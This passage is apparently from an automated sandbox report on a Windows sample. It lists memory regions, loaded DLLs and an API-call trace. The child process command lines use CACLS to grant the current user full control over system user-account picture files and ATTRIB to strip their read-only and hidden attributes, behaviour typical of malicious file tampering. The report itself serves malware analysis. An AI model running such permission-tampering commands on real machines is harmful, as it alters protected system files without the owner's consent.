end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26924 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26925 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26926 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26927 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26928 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26929 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26930 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26931 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 26932 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 26933 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26934 start_va = 0x75680000 end_va = 
0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26935 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26936 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26937 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26938 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26939 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 555 os_tid = 0x45c Thread: id = 556 os_tid = 0x90c Process: id = "390" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0x978" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "388" os_parent_pid = "0xfac" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated 
Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26940 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26941 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 26942 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 26943 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 26944 start_va = 0xad0000 end_va = 0xad6fff entry_point = 0xad0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26945 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26946 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26947 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26948 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26949 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26952 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26953 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 26954 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 26955 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26957 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26958 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26959 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26960 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file 
name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26961 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26962 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26963 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26964 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26965 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26966 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26967 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 26968 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26969 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Thread: id = 557 os_tid = 0xf78 Process: id = "391" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xefc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26970 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26971 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26972 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26973 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26974 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26975 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file 
name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26976 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26977 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26978 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26979 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26980 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26981 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26982 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26983 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26984 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 26985 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26986 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = 
"kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26987 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26988 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26989 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26990 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26991 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26992 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26993 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26994 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 26995 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 26996 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26997 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26998 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26999 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27000 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27001 start_va = 0x380000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 27002 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 27003 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 27004 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 558 os_tid = 0xfa4 [0187.055] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afbf4 | out: lpSystemTimeAsFileTime=0x2afbf4*(dwLowDateTime=0xa4667600, dwHighDateTime=0x1d440a9)) [0187.055] GetCurrentProcessId () returned 0xefc [0187.055] GetCurrentThreadId () returned 0xfa4 [0187.055] GetTickCount () returned 0x356a7 [0187.055] QueryPerformanceCounter (in: 
lpPerformanceCount=0x2afbec | out: lpPerformanceCount=0x2afbec*=24384415112) returned 1 [0187.056] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.056] __set_app_type (_Type=0x1) [0187.056] __p__fmode () returned 0x76b331f4 [0187.056] __p__commode () returned 0x76b331fc [0187.056] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.056] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.056] GetCurrentThreadId () returned 0xfa4 [0187.056] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa4) returned 0x38 [0187.056] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.056] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.056] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.056] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.056] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afb84 | out: phkResult=0x2afb84*=0x0) returned 0x2 [0187.056] VirtualQuery (in: lpAddress=0x2afbbb, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, 
State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.057] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afb54, dwLength=0x1c | out: lpBuffer=0x2afb54*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0187.057] GetConsoleOutputCP () returned 0x1b5 [0187.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.057] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.057] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.058] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.058] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.058] GetEnvironmentStringsW () returned 0x4b0308* [0187.058] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.058] GetEnvironmentStringsW () returned 0x4b0308* [0187.058] FreeEnvironmentStringsW (penv=0x4b0308) returned 1 [0187.058] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeaf4 | out: phkResult=0x2aeaf4*=0x40) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0xb8, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x0, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegCloseKey (hKey=0x40) returned 0x0 [0187.058] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeaf4 | out: phkResult=0x2aeaf4*=0x40) returned 0x0 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeafc, 
lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x40, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x1, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x0, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x9, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x4, lpData=0x2aeb00*=0x9, lpcbData=0x2aeaf8*=0x4) returned 0x0 [0187.059] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeafc, lpData=0x2aeb00, lpcbData=0x2aeaf8*=0x1000 | out: lpType=0x2aeafc*=0x0, lpData=0x2aeb00*=0x9, lpcbData=0x2aeaf8*=0x1000) returned 0x2 [0187.059] RegCloseKey (hKey=0x40) returned 0x0 [0187.059] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0187.059] srand (_Seed=0x5b886395) [0187.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile31.bmp\"" [0187.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp\"" [0187.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.059] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.059] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.059] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.059] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.059] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.060] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.060] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.060] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.060] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0187.060] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.060] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.060] 